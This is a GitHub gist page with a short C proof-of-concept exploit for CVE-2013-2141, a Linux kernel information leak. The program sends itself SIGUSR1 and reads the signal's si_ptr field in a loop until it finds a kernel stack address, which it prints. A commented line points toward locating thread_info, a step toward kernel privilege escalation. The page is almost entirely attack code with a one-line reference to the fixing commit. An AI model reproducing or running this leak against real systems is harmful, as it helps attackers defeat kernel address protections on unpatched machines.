Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Kernel Stack Leak: CVE-2013-2141
#include <stdio.h>
#include <signal.h>
#include <string.h>
/*
CVE-2013-2141
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b9e146d8eb3b9ecae5086d373b50fa0c1f3e7f0f
*/
void * kernel_stack_address = NULL;
static void sig_handler(int sig, siginfo_t *siginfo, void *ctx)
{
kernel_stack_address = siginfo->si_ptr;
}
void * getKernelStackAddress(){
while(kernel_stack_address < 0xBF000000){
struct sigaction act = {
.sa_sigaction = &sig_handler,
.sa_flags = SA_SIGINFO
};
if (sigaction(SIGUSR1, &act, NULL) < 0) {
perror ("sigaction");
return 1;
}
tkill(gettid(), SIGUSR1);
sleep(2);
}
printf("kstack : %p\n", kernel_stack_address);
return kernel_stack_address;
}
int main (int argc, char *argv[])
{
void * possKernelStackAddr = getKernelStackAddress();
// void * possibleThreadInfo = (possKernelStackAddr & 0xFFFFE000);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment